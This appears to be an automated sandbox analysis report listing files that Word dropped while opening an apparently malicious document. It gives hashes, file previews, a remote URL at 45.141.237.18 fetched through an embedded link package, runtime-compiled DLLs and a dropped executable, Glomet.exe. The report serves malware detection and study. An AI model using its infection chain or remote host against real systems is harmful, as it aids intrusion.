                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13687
                                                                                                                                                                            Entropy (8bit):4.949442412867092
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:mRbRj5lc7cd8d7u55ljNjmOqQPglwy8LIspaMnyuYH3iYmG/N:mXqZc5rHxPgKy8eXmG/N
                                                                                                                                                                            MD5:12BEF5B54D8D40957BDB611DA449C882
                                                                                                                                                                            SHA1:B9F4EA9C1B97F44386485469483A0F603151BAD7
                                                                                                                                                                            SHA-256:05CB7A919383D449B6D9A16A0C44689FCB557982B5DF33C8C28A676F1AD88F06
                                                                                                                                                                            SHA-512:15570BADD82DEF69C039E6740CE8C8D40B497FA43AFA3DBC8B90859E6526DA148CA0F131AF6C2E166757DB5712805C787006209A76387451343586E265604899
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">.. .. Modified from the Debian original for Ubuntu.. Last updated: 2016-11-16.. See: https://launchpad.net/bugs/1288690.. -->.. <head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.. <title>Apache2 Ubuntu Default Page: It works</title>.. <style type="text/css" media="screen">.. * {.. margin: 0px 0px 0px 0px;.. padding: 0px 0px 0px 0px;.. }.... body, html {.. padding: 3px 3px 3px 3px;.... background-color: #D8DBE2;.... font-family: Verdana, sans-serif;.. font-size: 11pt;.. text-align: center;.. }.... div.main_page {.. position: relative;.. display: table;.... width: 800px;.... margin-bottom: 3px;.. margin-left: auto;.. margin-right: auto;.. padding: 0px 0px 0px 0px;.... border-width: 2px;.. border-color: #212738;.. border-style: solid;.... background-color: #FFFFFF;.... text-align: center;.. }.... div.page_header {.. height: 99px;.. widt

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E503F16F.png

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:PNG image data, 2317 x 3433, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):892832
                                                                                                                                                                            Entropy (8bit):7.982421044887424
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:n1yg5B+jHQ89ihbudaSMcKdth3ut3w7mM4nn3:nJzQQ8U4fwdqtb33
                                                                                                                                                                            MD5:D03E61E58D5AD8C605BF20773F992D81
                                                                                                                                                                            SHA1:D6E522722F7E813A32440E5EA6EF613EC56F5385
                                                                                                                                                                            SHA-256:1F57DF9FA9C4A7BA05BF80FA755073C314DFAB1A3C9163810CFC36B375D9BD21
                                                                                                                                                                            SHA-512:3D20F5E5F3391F07CCEC26B05E1B109E43A745FBDEE991C3D658E4706ABEC4BE6A85CB37AB9887C0C22A26B2FC8E4262B72BADD22257B875ABA98F49647FBB77
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR.......i........G....PLTE...........................................................................................................................................................................................................................................................~~~{{{yyywww.....uuu...sss...}}}qqq...ooo...mmmiiikkk......S.................\.......X....O..u..d..r..k.....offf..`.._^]..e..QQPJJI.p..XXW....t.l..h..Y....g....S...R.b..]...S....r..q.._(&!..G<...r.Q..O...bqiS430..Y@>:....}N.wKys_u.Mp....IDATx...1......=.o...p...............................................................O...;Vm#..0:.}I....tc$..b..V....M#;....'.F....w.....0E.}...LQC_FE..x....rU...5...4BU...+..&5..",G...s..U..#j...i.....5...4BU.....|n.P...0....".-.w.\#..I5BU........F...5.0.....P.....{....kRC.*.b.........*...`...*.bl.vj..D.P.A..0..P..kh....v..~.V....j..D.P.a1V..kh...j... T#TE........Q#TEX.=...............Z........*....zJ..5..\.a1....<.].o6.....S

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FF013E73.htm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):13687
                                                                                                                                                                            Entropy (8bit):4.949442412867092
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:mRbRj5lc7cd8d7u55ljNjmOqQPglwy8LIspaMnyuYH3iYmG/N:mXqZc5rHxPgKy8eXmG/N
                                                                                                                                                                            MD5:12BEF5B54D8D40957BDB611DA449C882
                                                                                                                                                                            SHA1:B9F4EA9C1B97F44386485469483A0F603151BAD7
                                                                                                                                                                            SHA-256:05CB7A919383D449B6D9A16A0C44689FCB557982B5DF33C8C28A676F1AD88F06
                                                                                                                                                                            SHA-512:15570BADD82DEF69C039E6740CE8C8D40B497FA43AFA3DBC8B90859E6526DA148CA0F131AF6C2E166757DB5712805C787006209A76387451343586E265604899
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">.. .. Modified from the Debian original for Ubuntu.. Last updated: 2016-11-16.. See: https://launchpad.net/bugs/1288690.. -->.. <head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.. <title>Apache2 Ubuntu Default Page: It works</title>.. <style type="text/css" media="screen">.. * {.. margin: 0px 0px 0px 0px;.. padding: 0px 0px 0px 0px;.. }.... body, html {.. padding: 3px 3px 3px 3px;.... background-color: #D8DBE2;.... font-family: Verdana, sans-serif;.. font-size: 11pt;.. text-align: center;.. }.... div.main_page {.. position: relative;.. display: table;.... width: 800px;.... margin-bottom: 3px;.. margin-left: auto;.. margin-right: auto;.. padding: 0px 0px 0px 0px;.... border-width: 2px;.. border-color: #212738;.. border-style: solid;.... background-color: #FFFFFF;.... text-align: center;.. }.... div.page_header {.. height: 99px;.. widt

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3F734575-446A-409F-ABF0-279D9EE55D72}.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D2D7FF17-FD00-4D6F-9BD0-D27E7B55D2C5}.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2048
                                                                                                                                                                            Entropy (8bit):1.1959987669902177
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:vlAlIcElClTfbobK/Wt56PxZUtdmP//rxZUtalR:il7MClLYKIAZfnjxZxR
                                                                                                                                                                            MD5:2DFA071ED21064A16E213E665D069A70
                                                                                                                                                                            SHA1:A07D9C011D517E6CD6D0E6E065C0DA57802E4033
                                                                                                                                                                            SHA-256:6803C9DF1EA2C0DEB625A798499FE824713ABAC1DFE3D48B66F219073EE05F27
                                                                                                                                                                            SHA-512:E3F2C304576B742AC14835D746857F6DEC839A3333452C8222D20BA8F20317B588AA5590DF3AAE5C9C091092B1D21D41DEC70A5634E9372B46C43AC9D35A67A4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:../...........................................................................L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.:././.4.5...1.4.1...2.3.7...1.8./.G.l.o.m.e.t...h.t.m.l.!.". .".". .\.b..... . ........................................................................................................................................................................................................................................................................................................................................................................................... ..."...$...&...(...*...,.......0...2...4...6...8...:...<...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Glomet[1].htm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):13687
                                                                                                                                                                            Entropy (8bit):4.949442412867092
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:mRbRj5lc7cd8d7u55ljNjmOqQPglwy8LIspaMnyuYH3iYmG/N:mXqZc5rHxPgKy8eXmG/N
                                                                                                                                                                            MD5:12BEF5B54D8D40957BDB611DA449C882
                                                                                                                                                                            SHA1:B9F4EA9C1B97F44386485469483A0F603151BAD7
                                                                                                                                                                            SHA-256:05CB7A919383D449B6D9A16A0C44689FCB557982B5DF33C8C28A676F1AD88F06
                                                                                                                                                                            SHA-512:15570BADD82DEF69C039E6740CE8C8D40B497FA43AFA3DBC8B90859E6526DA148CA0F131AF6C2E166757DB5712805C787006209A76387451343586E265604899
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:http://45.141.237.18/Glomet.html
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">.. .. Modified from the Debian original for Ubuntu.. Last updated: 2016-11-16.. See: https://launchpad.net/bugs/1288690.. -->.. <head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.. <title>Apache2 Ubuntu Default Page: It works</title>.. <style type="text/css" media="screen">.. * {.. margin: 0px 0px 0px 0px;.. padding: 0px 0px 0px 0px;.. }.... body, html {.. padding: 3px 3px 3px 3px;.... background-color: #D8DBE2;.... font-family: Verdana, sans-serif;.. font-size: 11pt;.. text-align: center;.. }.... div.main_page {.. position: relative;.. display: table;.... width: 800px;.... margin-bottom: 3px;.. margin-left: auto;.. margin-right: auto;.. padding: 0px 0px 0px 0px;.... border-width: 2px;.. border-color: #212738;.. border-style: solid;.... background-color: #FFFFFF;.... text-align: center;.. }.... div.page_header {.. height: 99px;.. widt

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES216A.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.107921334408074
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:H3C9AWPavlhHJhKhfII+ycuZhNxYakS+NPNnq9Wd:3WPaf3Khg1ul6a3eq9m
                                                                                                                                                                            MD5:E10D65B42989EE1A81F58BB5BC906C6B
                                                                                                                                                                            SHA1:F37727D9D435E48D8582793BA1AE08B7E95859D9
                                                                                                                                                                            SHA-256:4F474C108A55F638F0C6C74685A787846E17082DA73D026D307B1B4F294E698E
                                                                                                                                                                            SHA-512:B6BA1470FF791335E790F16CC1B7F5D062F6DFDCF26CE87CDE7A062C2C6AA9E49F7F0ED3F5DC6AA5A5525C6553C9704E450E4ADCC13CCFD4BB68660F622FB1CB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP.................z.{M.#fC..qM............4.......C:\Users\user\AppData\Local\Temp\RES216A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_26d32acb-2999-4d66-b897-077572d4c005.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.0.v.y.i.o.h.n...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RES3EE5.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.113039111867716
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:Hw4C9AWPdDjQthH/hKhfII+ycuZhNDJakSC+PNnq9Wd:fWPdDEf5Khg1ulDJa3Ciq9m
                                                                                                                                                                            MD5:2784739133C6C05A11DE99F7B435C2B1
                                                                                                                                                                            SHA1:CF2A49552AF4249CF77CA09D64F619693D78EF6D
                                                                                                                                                                            SHA-256:FB8282AC1876F7CAD135B7789342DDBFFB85268169259A6A0BF6FAEF5CAFF0F0
                                                                                                                                                                            SHA-512:109C7EB2D30414C3C23FF3116C4B55F54579907ABE8CFCA84EA746934D7ECA04E1C7FC40D21267C895589EFF9F1DB4D1F7D42ED14EFE9C5A003F8DBEEB8EE933
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP.....................sz.I...x............4.......C:\Users\user\AppData\Local\Temp\RES3EE5.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_26d32acb-2999-4d66-b897-077572d4c005.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.a.1.3.q.2.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\RESDEDE.tmp

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.092561220070632
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:H/pC9AWPuQFehHRhKhfII+ycuZhNyuakSTvPNnq9Wd:fFWPfFi/Khg1ulyua3Ttq9m
                                                                                                                                                                            MD5:7356D9596592DB2199A07141A43A0D44
                                                                                                                                                                            SHA1:E529C150A28154B1EADFCFAEFA5050D3642C2CC0
                                                                                                                                                                            SHA-256:966BD4F40C736780C7446B95C669AD076888A4CAEF3D13B9C99AFA1B3DC07FDD
                                                                                                                                                                            SHA-512:9D74364036126570CD2D2D819908328FF19BA600123AF6D0220390C94DC083CA86C58BFD665CC0469D0DBEABC97C5D1FED786A5655D8AFF28FBEE148F30C0530
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP.................wv:...-B.n.m{To..........4.......C:\Users\user\AppData\Local\Temp\RESDEDE.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_26d32acb-2999-4d66-b897-077572d4c005.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.l.h.o.p.h.4.d...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.1146569844572216
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqlWJak7YnqqJlW+PN5Dlq5J:+RI+ycuZhNDJakSC+PNnqX
                                                                                                                                                                            MD5:B3B8CEB8B98E737A9D49AFC19178CB1F
                                                                                                                                                                            SHA1:1E312CEDF861C940A8185843FB4B094FB29E208E
                                                                                                                                                                            SHA-256:35D0C0A80454C1CC5907E06301B3A5498E93444B1BC5B6CC08494490FE8C8B07
                                                                                                                                                                            SHA-512:39A7E54B8EC5A50A3634E34A6859F1733AA21FBA96C7DA16C7A54834C7BF74121BC6D90ECCC72CDAF876BE36182C5690FDEE2BBBAD2C87226BC4254BECB20D1D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.a.1.3.q.2.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.a.1.3.q.2.3.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                            Entropy (8bit):3.0913167759627336
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:6t4pqb927GslPwVDRjyJVOKk1ulDJa3Ciq:Ec7GTan5JKC
                                                                                                                                                                            MD5:0CEA21BB0023353D453BB07A7B3B33E2
                                                                                                                                                                            SHA1:2791372A575789C8333EA68F574776F7E0C59408
                                                                                                                                                                            SHA-256:FCD0121789475B5524567C4C6B52267B8D24D25B9C86D3900A0F93C463F75A4B
                                                                                                                                                                            SHA-512:2B5804D9091DBEBFFA3BE253647C24276A9886E5A2A1A55BD14A38DB1722A0277642BC96B067BE1A0027499951A2B9FD4C7FD5A4A29D8B3AE47DA4C92EB00304
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.07986720180676
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYuak7YnqqTvPN5Dlq5J:+RI+ycuZhNyuakSTvPNnqX
                                                                                                                                                                            MD5:D777763A83B5842D42C86EB96D7B546F
                                                                                                                                                                            SHA1:11A9307069E68F86149C6BD3D8185F2A2EA6DE84
                                                                                                                                                                            SHA-256:4BF71A94F2040EF2A338909302A9735B0531AC4867C715103B695D297C090EA6
                                                                                                                                                                            SHA-512:A2C862F1AD6201072A1987E3D9A7F6D2EF3F42FEBD3185DA68A847EC025DC902498F253FDF3B4A3EEA30D8DE3F83FAC111225278350A69C134AAA5859590F7FE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.l.h.o.p.h.4.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.l.h.o.p.h.4.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                            Entropy (8bit):4.795339770730082
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:tKqedmYoNKvUTCSH3gR8H8FgwSHwBOkwZYPaSJ365OdieMjQZagRnIjIuKT:kElNK8TCSfHyPOkwZ+vKOuQZ1nf
                                                                                                                                                                            MD5:915A0B67FBB51FD6188CC5575AF4A6DF
                                                                                                                                                                            SHA1:9FDE28753EF7611847A2CEEE742B7E0FB711DB7F
                                                                                                                                                                            SHA-256:F0B4091339FE2802EAC189218C2588CE0FC1FA905F0A286839CD1964BF813087
                                                                                                                                                                            SHA-512:32837394C4A2A45C1BE0D2BA656E39A0531DC798C93C4347038F04053175B357DEC615003D86099F26970723E730C725E859EA558ACC9ECDF1084C085C9DBD2B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dll

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                            Entropy (8bit):5.1793678932213725
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:AOBtEB2flLkatAthPZJoi9jpfW/er6cBbcB/NFyVOHd0+uHwEX:AhB2flXAVJtjf6cBbcB/N8Ved0PZ
                                                                                                                                                                            MD5:5AA38904ACDCC21A2FB8A1D30A72D92F
                                                                                                                                                                            SHA1:A9CE7D1456698921791DB91347DBA0489918D70C
                                                                                                                                                                            SHA-256:10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
                                                                                                                                                                            SHA-512:F04740DA561D7CD0DEA5E839C9E1C339D4A3E63944D3566C94C921A3D170A69918A32DFF3F3B43F13D55CC25A2DBB4C21104F062C324308AC5104179766402A3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: E-dekont.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Requirements.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.26675.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: SecuriteInfo.com.Variant.Tedy.166527.30135.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: SecuriteInfo.com.ArtemisF2FD6E65491E.4347.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.0879498005127113
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzYak7Ynqq+NPN5Dlq5J:+RI+ycuZhNxYakS+NPNnqX
                                                                                                                                                                            MD5:947AA97B4D8B236643D8A8FD714DCDFC
                                                                                                                                                                            SHA1:CB677780F174368CEA98711BC3715CFA0C7B7ED5
                                                                                                                                                                            SHA-256:C5CDF225AD3F9CD4DE72C3C3CC2028490343490F889238338EDE6A0B076F93B9
                                                                                                                                                                            SHA-512:D9B31CD496CA957E18FB4F5BBD7122A167079CE193C096FC3A417D79C5D583D80695D7C43416ABFA6C0095FFD31EDD3D148DC1FC55D3E0D788F2CE7AC0D2DFE0
                                                                                                                                                                            Malicious:false
